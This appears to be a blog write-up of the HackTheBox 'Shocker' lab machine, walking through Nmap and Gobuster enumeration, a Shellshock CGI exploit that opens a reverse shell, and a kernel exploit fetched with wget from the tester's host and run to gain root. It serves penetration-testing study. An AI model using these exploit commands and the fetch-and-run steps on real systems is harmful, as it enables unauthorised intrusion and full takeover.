HackTheBox: Shocker

The first step was to scan the machine with Nmap to find running services.

# Nmap 7.80 scan initiated Sun Oct  4 13:05:39 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.016s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Aggressive OS guesses: Linux 3.13 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%), Linux 4.9 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct  4 13:06:11 2020 -- 1 IP address (1 host up) scanned in 32.42 seconds

We can see from the output that the host is running Apache 2.4.18 and OpenSSH on port 2222. I browsed to the site on Apache and was greeting with:

I then ran Gobuster against the machine to try and find hidden files.

root@kali:/home/kali/Documents/shocker# gobuster dir --url http://10.10.10.56 --wordlist /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.56
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/06 14:02:31 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/server-status (Status: 403)
===============================================================
2020/10/06 14:04:39 Finished
===============================================================

As you can see on the initial scan, nothing significant was found. It did however indicate the presence of a CGI-BIN directory. I decided to perform an additional scan against this directory using the same wordlist but looking for multiple file extension types, those which would generally be found in CGI-BIN.

root@kali:/home/kali/Documents/shocker# gobuster dir --url http://10.10.10.56/cgi-bin --wordlist /usr/share/wordlists/dirb/big.txt -x cgi,php,bat,html,htm,sh,asp,aspx,CGI,shtm,shtml
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.56/cgi-bin
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     aspx,shtm,shtml,bat,html,sh,asp,cgi,php,htm,CGI
[+] Timeout:        10s
===============================================================
2020/10/05 15:15:55 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.htaccess.bat (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.sh (Status: 403)
/.htaccess.asp (Status: 403)
/.htaccess.aspx (Status: 403)
/.htaccess.shtm (Status: 403)
/.htaccess.shtml (Status: 403)
/.htaccess.cgi (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.htm (Status: 403)
/.htaccess.CGI (Status: 403)
/.htpasswd.htm (Status: 403)
/.htpasswd.CGI (Status: 403)
/.htpasswd.cgi (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.asp (Status: 403)
/.htpasswd.aspx (Status: 403)
/.htpasswd.shtm (Status: 403)
/.htpasswd.shtml (Status: 403)
/.htpasswd.bat (Status: 403)
/user.sh (Status: 200)
===============================================================
2020/10/05 15:25:31 Finished
===============================================================

You can see right at the bottom of this output that the file user.sh was discovered. This file contains the following:

Content-Type: text/plain

Just an uptime test script

 14:08:46 up 23:07,  0 users,  load average: 0.00, 0.00, 0.00

There’s a big hint with the name of the machine being Shocker, that its very likely to be vulnerable to the shellshock vulnerability. After some Googling i discovered an exploit in this version of Apache. It is a remote command injection shellshock vulnerability which can be executed against CGI scripts. I downloaded the exploit and ran it against the Shocker machine specifying the user.sh file in the arguments:

root@kali:/home/kali/Documents/shocker# python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.38 lport=2600 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> ls
user.sh

10.10.10.56> cd /

10.10.10.56> ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old

10.10.10.56> cd home
10.10.10.56> ls
shelly

10.10.10.56> cd shelly
10.10.10.56> ls
user.txt

10.10.10.56> cat user.txt
[REDACTED]

As you can see from the output above, this exploit executed successful and I was able to cat the user flag. I now needed to escalate privileges to capture the root flag. I checked the kernel version and found it was running 4.4.0-96-generic.

10.10.10.56> uname -a
Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

A quick google search found there was a kernel exploit for this kernel. I downloaded this exploit and compiled it.

root@kali:/home/kali/Downloads# gcc 44298.c -o 44

I then hosted the binary on a python simple HTTP server and downloaded it on the Shocker machine with wget.

10.10.10.56> wget http://10.10.14.38:8000/44
--2020-10-06 13:57:42--  http://10.10.14.38:8000/44

10.10.10.56> ls -la
Connecting to 10.10.14.38:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: '44'

     0K .......... .......                                    100%  337K=0.05s

2020-10-06 13:57:42 (337 KB/s) - '44' saved [17880/17880]

The file was then made executable with chmod -x and executed.

10.10.10.56> chmod +x 44

10.10.10.56> ./44
10.10.10.56> whoami
root

You can see from the output that it executed successfully, and I was now a root user on the machine. I finished by capturing the root flag.

10.10.10.56> cd /root
10.10.10.56> ls
root.txt

10.10.10.56> cat root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *